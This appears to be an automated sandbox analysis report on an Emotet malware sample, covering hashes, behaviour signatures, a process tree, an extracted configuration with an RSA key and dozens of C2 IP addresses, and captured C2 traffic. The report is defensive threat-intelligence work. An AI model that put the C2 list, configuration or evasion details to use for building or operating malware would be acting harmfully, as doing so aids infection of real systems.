Loading ...

Play interactive tourEdit tour

Analysis Report MV9tCJw8Xr

Overview

General Information

Sample Name:MV9tCJw8Xr (renamed file extension from none to exe)
Analysis ID:356776
MD5:b12817c1c8ba085a7a82655fba90e53d
SHA1:1f56268ada7ef3e7b788121cfa2ca1879cf70f1e
SHA256:61e37534bfb2acbb787788100b1932f5011cbc98db86ce10b7a8a730d2a4de35
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • MV9tCJw8Xr.exe (PID: 6552 cmdline: 'C:\Users\user\Desktop\MV9tCJw8Xr.exe' MD5: B12817C1C8BA085A7A82655FBA90E53D)
    • KBDHEB.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe MD5: B12817C1C8BA085A7A82655FBA90E53D)
      • tokenbinding2.exe (PID: 6176 cmdline: 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA= MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
        • KBDHEB.exe (PID: 3596 cmdline: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
          • execmodelproxy.exe (PID: 3316 cmdline: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
            • COLORCNV.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
              • usp10.exe (PID: 5260 cmdline: C:\Windows\SysWOW64\glu32\usp10.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                • KBDINTAM.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                  • msrd2x40.exe (PID: 2772 cmdline: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                    • MCCSEngineShared.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                      • jscript9.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                        • wmvdspa.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\ftp\wmvdspa.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                          • msvcr100_clr0400.exe (PID: 7028 cmdline: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                            • catsrvut.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                              • mprdim.exe (PID: 1856 cmdline: C:\Windows\SysWOW64\d3dramp\mprdim.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
  • svchost.exe (PID: 6836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5676 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5532 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4924 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5452 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4620 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAK0tD7DHdiTSfIU1WweFow3PfGxe/CRZ\n7RfHk7MnaOjnNJew7LHRiqSJHrLuGCM9Hhwr6X6Fo6BovhbAzlkBAKvDbpyms/Eq\nTV9arC8ISLFmyZS1gzLyBcE4wYE3YM5tzQIDAQAB", "C2 list": ["80.158.59.174:8080", "80.158.43.136:80", "80.158.3.161:443", "80.158.51.209:8080", "80.158.35.51:80", "80.158.63.78:443", "80.158.53.167:80", "58.27.215.3:8080", "75.127.14.170:8080", "198.20.228.9:8080", "37.205.9.252:7080", "120.51.34.254:80", "41.185.29.128:8080", "172.105.78.244:8080", "175.103.38.146:80", "190.164.135.81:80", "183.91.3.63:80", "109.13.179.195:80", "77.74.78.80:443", "126.126.139.26:443", "58.94.58.13:80", "162.144.145.58:8080", "197.221.227.78:80", "180.148.4.130:8080", "203.56.191.129:8080", "103.229.73.17:8080", "113.203.238.130:80", "188.166.220.180:7080", "152.32.75.74:443", "178.254.36.182:8080", "5.2.164.75:80", "42.200.96.63:80", "202.29.237.113:8080", "190.192.39.136:80", "103.93.220.182:80", "109.99.146.210:8080", "187.193.221.143:80", "116.202.10.123:8080", "46.105.131.68:8080", "50.116.78.109:8080", "181.59.59.54:80", "185.208.226.142:8080", "188.80.27.54:80", "2.58.16.86:8080", "192.241.220.183:8080", "95.76.142.243:80", "203.153.216.178:7080", "157.7.164.178:8081", "200.243.153.66:80", "195.201.56.70:8080", "73.55.128.120:80", "190.85.46.52:7080", "213.165.178.214:80", "143.95.101.72:8080", "41.76.213.144:8080", "178.33.167.120:8080", "201.163.74.203:80", "185.142.236.163:443", "121.117.147.153:443", "190.212.140.6:80", "60.108.128.186:80", "177.130.51.198:80", "54.38.143.245:8080", "179.5.118.12:80", "109.206.139.119:80", "192.210.217.94:8080", "85.246.78.192:80", "45.239.204.100:80", "185.80.172.199:80", "91.75.75.46:80", "2.82.75.215:80", "115.79.195.246:80", "190.55.186.229:80", "8.4.9.137:8080", "91.83.93.103:443", "192.163.221.191:8080", "117.2.139.117:443", "78.90.78.210:80", "153.229.219.1:443", "110.37.224.243:80", "115.79.59.157:80", "37.46.129.215:8080", "5.79.70.250:8080", "153.204.122.254:80", "74.208.173.91:8080", "139.59.61.215:443", "119.228.75.211:80", "189.123.103.233:80", "190.194.12.132:80", "223.17.215.76:80", "73.100.19.104:80", "79.133.6.236:8080", "103.80.51.61:8080", "172.96.190.154:8080", "5.2.246.108:80"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            32.2.jscript9.exe.400000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              2.2.KBDHEB.exe.5b053f.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                30.2.msrd2x40.exe.400000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  22.2.tokenbinding2.exe.400000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    37.2.catsrvut.exe.2ae279e.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 69 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: MV9tCJw8Xr.exeAvira: detected
                      Found malware configurationShow sources
                      Source: 23.2.KBDHEB.exe.2b6279e.3.raw.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAK0tD7DHdiTSfIU1WweFow3PfGxe/CRZ\n7RfHk7MnaOjnNJew7LHRiqSJHrLuGCM9Hhwr6X6Fo6BovhbAzlkBAKvDbpyms/Eq\nTV9arC8ISLFmyZS1gzLyBcE4wYE3YM5tzQIDAQAB", "C2 list": ["80.158.59.174:8080", "80.158.43.136:80", "80.158.3.161:443", "80.158.51.209:8080", "80.158.35.51:80", "80.158.63.78:443", "80.158.53.167:80", "58.27.215.3:8080", "75.127.14.170:8080", "198.20.228.9:8080", "37.205.9.252:7080", "120.51.34.254:80", "41.185.29.128:8080", "172.105.78.244:8080", "175.103.38.146:80", "190.164.135.81:80", "183.91.3.63:80", "109.13.179.195:80", "77.74.78.80:443", "126.126.139.26:443", "58.94.58.13:80", "162.144.145.58:8080", "197.221.227.78:80", "180.148.4.130:8080", "203.56.191.129:8080", "103.229.73.17:8080", "113.203.238.130:80", "188.166.220.180:7080", "152.32.75.74:443", "178.254.36.182:8080", "5.2.164.75:80", "42.200.96.63:80", "202.29.237.113:8080", "190.192.39.136:80", "103.93.220.182:80", "109.99.146.210:8080", "187.193.221.143:80", "116.202.10.123:8080", "46.105.131.68:8080", "50.116.78.109:8080", "181.59.59.54:80", "185.208.226.142:8080", "188.80.27.54:80", "2.58.16.86:8080", "192.241.220.183:8080", "95.76.142.243:80", "203.153.216.178:7080", "157.7.164.178:8081", "200.243.153.66:80", "195.201.56.70:8080", "73.55.128.120:80", "190.85.46.52:7080", "213.165.178.214:80", "143.95.101.72:8080", "41.76.213.144:8080", "178.33.167.120:8080", "201.163.74.203:80", "185.142.236.163:443", "121.117.147.153:443", "190.212.140.6:80", "60.108.128.186:80", "177.130.51.198:80", "54.38.143.245:8080", "179.5.118.12:80", "109.206.139.119:80", "192.210.217.94:8080", "85.246.78.192:80", "45.239.204.100:80", "185.80.172.199:80", "91.75.75.46:80", "2.82.75.215:80", "115.79.195.246:80", "190.55.186.229:80", "8.4.9.137:8080", "91.83.93.103:443", "192.163.221.191:8080", "117.2.139.117:443", "78.90.78.210:80", "153.229.219.1:443", "110.37.224.243:80", "115.79.59.157:80", "37.46.129.215:8080", "5.79.70.250:8080", "153.204.122.254:80", "74.208.173.91:8080", "139.59.61.215:443", "119.228.75.211:80", "189.123.103.233:80", "190.194.12.132:80", "223.17.215.76:80", "73.100.19.104:80", "79.133.6.236:8080", "103.80.51.61:8080", "172.96.190.154:8080", "5.2.246.108:80"]}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeMetadefender: Detection: 54%Perma Link
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeReversingLabs: Detection: 92%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: MV9tCJw8Xr.exeVirustotal: Detection: 66%Perma Link
                      Source: MV9tCJw8Xr.exeMetadefender: Detection: 56%Perma Link
                      Source: MV9tCJw8Xr.exeReversingLabs: Detection: 77%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeJoe Sandbox ML: detected
                      Source: 2.2.KBDHEB.exe.5b053f.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 1.2.MV9tCJw8Xr.exe.218053f.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D1D83 CryptDecodeObjectEx,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00401000 GetProcessHeap,RtlAllocateHeap,CryptStringToBinaryW,CryptStringToBinaryW,

                      Compliance:

                      barindex
                      Uses 32bit PE filesShow sources
                      Source: MV9tCJw8Xr.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E28D9 FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D28D9 FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A58C57 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 80.158.59.174:8080
                      Source: Malware configuration extractorIPs: 80.158.43.136:80
                      Source: Malware configuration extractorIPs: 80.158.3.161:443
                      Source: Malware configuration extractorIPs: 80.158.51.209:8080
                      Source: Malware configuration extractorIPs: 80.158.35.51:80
                      Source: Malware configuration extractorIPs: 80.158.63.78:443
                      Source: Malware configuration extractorIPs: 80.158.53.167:80
                      Source: Malware configuration extractorIPs: 58.27.215.3:8080
                      Source: Malware configuration extractorIPs: 75.127.14.170:8080
                      Source: Malware configuration extractorIPs: 198.20.228.9:8080
                      Source: Malware configuration extractorIPs: 37.205.9.252:7080
                      Source: Malware configuration extractorIPs: 120.51.34.254:80
                      Source: Malware configuration extractorIPs: 41.185.29.128:8080
                      Source: Malware configuration extractorIPs: 172.105.78.244:8080
                      Source: Malware configuration extractorIPs: 175.103.38.146:80
                      Source: Malware configuration extractorIPs: 190.164.135.81:80
                      Source: Malware configuration extractorIPs: 183.91.3.63:80
                      Source: Malware configuration extractorIPs: 109.13.179.195:80
                      Source: Malware configuration extractorIPs: 77.74.78.80:443
                      Source: Malware configuration extractorIPs: 126.126.139.26:443
                      Source: Malware configuration extractorIPs: 58.94.58.13:80
                      Source: Malware configuration extractorIPs: 162.144.145.58:8080
                      Source: Malware configuration extractorIPs: 197.221.227.78:80
                      Source: Malware configuration extractorIPs: 180.148.4.130:8080
                      Source: Malware configuration extractorIPs: 203.56.191.129:8080
                      Source: Malware configuration extractorIPs: 103.229.73.17:8080
                      Source: Malware configuration extractorIPs: 113.203.238.130:80
                      Source: Malware configuration extractorIPs: 188.166.220.180:7080
                      Source: Malware configuration extractorIPs: 152.32.75.74:443
                      Source: Malware configuration extractorIPs: 178.254.36.182:8080
                      Source: Malware configuration extractorIPs: 5.2.164.75:80
                      Source: Malware configuration extractorIPs: 42.200.96.63:80
                      Source: Malware configuration extractorIPs: 202.29.237.113:8080
                      Source: Malware configuration extractorIPs: 190.192.39.136:80
                      Source: Malware configuration extractorIPs: 103.93.220.182:80
                      Source: Malware configuration extractorIPs: 109.99.146.210:8080
                      Source: Malware configuration extractorIPs: 187.193.221.143:80
                      Source: Malware configuration extractorIPs: 116.202.10.123:8080
                      Source: Malware configuration extractorIPs: 46.105.131.68:8080
                      Source: Malware configuration extractorIPs: 50.116.78.109:8080
                      Source: Malware configuration extractorIPs: 181.59.59.54:80
                      Source: Malware configuration extractorIPs: 185.208.226.142:8080
                      Source: Malware configuration extractorIPs: 188.80.27.54:80
                      Source: Malware configuration extractorIPs: 2.58.16.86:8080
                      Source: Malware configuration extractorIPs: 192.241.220.183:8080
                      Source: Malware configuration extractorIPs: 95.76.142.243:80
                      Source: Malware configuration extractorIPs: 203.153.216.178:7080
                      Source: Malware configuration extractorIPs: 157.7.164.178:8081
                      Source: Malware configuration extractorIPs: 200.243.153.66:80
                      Source: Malware configuration extractorIPs: 195.201.56.70:8080
                      Source: Malware configuration extractorIPs: 73.55.128.120:80
                      Source: Malware configuration extractorIPs: 190.85.46.52:7080
                      Source: Malware configuration extractorIPs: 213.165.178.214:80
                      Source: Malware configuration extractorIPs: 143.95.101.72:8080
                      Source: Malware configuration extractorIPs: 41.76.213.144:8080
                      Source: Malware configuration extractorIPs: 178.33.167.120:8080
                      Source: Malware configuration extractorIPs: 201.163.74.203:80
                      Source: Malware configuration extractorIPs: 185.142.236.163:443
                      Source: Malware configuration extractorIPs: 121.117.147.153:443
                      Source: Malware configuration extractorIPs: 190.212.140.6:80
                      Source: Malware configuration extractorIPs: 60.108.128.186:80
                      Source: Malware configuration extractorIPs: 177.130.51.198:80
                      Source: Malware configuration extractorIPs: 54.38.143.245:8080
                      Source: Malware configuration extractorIPs: 179.5.118.12:80
                      Source: Malware configuration extractorIPs: 109.206.139.119:80
                      Source: Malware configuration extractorIPs: 192.210.217.94:8080
                      Source: Malware configuration extractorIPs: 85.246.78.192:80
                      Source: Malware configuration extractorIPs: 45.239.204.100:80
                      Source: Malware configuration extractorIPs: 185.80.172.199:80
                      Source: Malware configuration extractorIPs: 91.75.75.46:80
                      Source: Malware configuration extractorIPs: 2.82.75.215:80
                      Source: Malware configuration extractorIPs: 115.79.195.246:80
                      Source: Malware configuration extractorIPs: 190.55.186.229:80
                      Source: Malware configuration extractorIPs: 8.4.9.137:8080
                      Source: Malware configuration extractorIPs: 91.83.93.103:443
                      Source: Malware configuration extractorIPs: 192.163.221.191:8080
                      Source: Malware configuration extractorIPs: 117.2.139.117:443
                      Source: Malware configuration extractorIPs: 78.90.78.210:80
                      Source: Malware configuration extractorIPs: 153.229.219.1:443
                      Source: Malware configuration extractorIPs: 110.37.224.243:80
                      Source: Malware configuration extractorIPs: 115.79.59.157:80
                      Source: Malware configuration extractorIPs: 37.46.129.215:8080
                      Source: Malware configuration extractorIPs: 5.79.70.250:8080
                      Source: Malware configuration extractorIPs: 153.204.122.254:80
                      Source: Malware configuration extractorIPs: 74.208.173.91:8080
                      Source: Malware configuration extractorIPs: 139.59.61.215:443
                      Source: Malware configuration extractorIPs: 119.228.75.211:80
                      Source: Malware configuration extractorIPs: 189.123.103.233:80
                      Source: Malware configuration extractorIPs: 190.194.12.132:80
                      Source: Malware configuration extractorIPs: 223.17.215.76:80
                      Source: Malware configuration extractorIPs: 73.100.19.104:80
                      Source: Malware configuration extractorIPs: 79.133.6.236:8080
                      Source: Malware configuration extractorIPs: 103.80.51.61:8080
                      Source: Malware configuration extractorIPs: 172.96.190.154:8080
                      Source: Malware configuration extractorIPs: 5.2.246.108:80
                      Source: unknownNetwork traffic detected: IP country count 35
                      Source: global trafficTCP traffic: 192.168.2.7:49734 -> 79.143.178.194:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49742 -> 87.106.136.232:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49752 -> 87.106.139.101:8080
                      Source: Joe Sandbox ViewIP Address: 143.95.101.72 143.95.101.72
                      Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
                      Source: Joe Sandbox ViewASN Name: CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN
                      Source: Joe Sandbox ViewASN Name: OCNNTTCommunicationsCorporationJP OCNNTTCommunicationsCorporationJP
                      Source: global trafficTCP traffic: 192.168.2.7:49726 -> 190.144.18.198:80
                      Source: global trafficHTTP traffic detected: POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/Content-Type: multipart/form-data; boundary=---------------------------270479976396707User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.106.139.101:8080Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/ HTTP/1.1Referer: http://87.106.139.101/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/Content-Type: multipart/form-data; boundary=---------------------------478597482596704User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.106.139.101:8080Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.144.18.198
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.144.18.198
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.144.18.198
                      Source: unknownTCP traffic detected without corresponding DNS query: 79.143.178.194
                      Source: unknownTCP traffic detected without corresponding DNS query: 79.143.178.194
                      Source: unknownTCP traffic detected without corresponding DNS query: 79.143.178.194
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.136.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.136.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.136.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D2014 InternetReadFile,
                      Source: svchost.exe, 00000014.00000003.400693153.000002847D776000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free 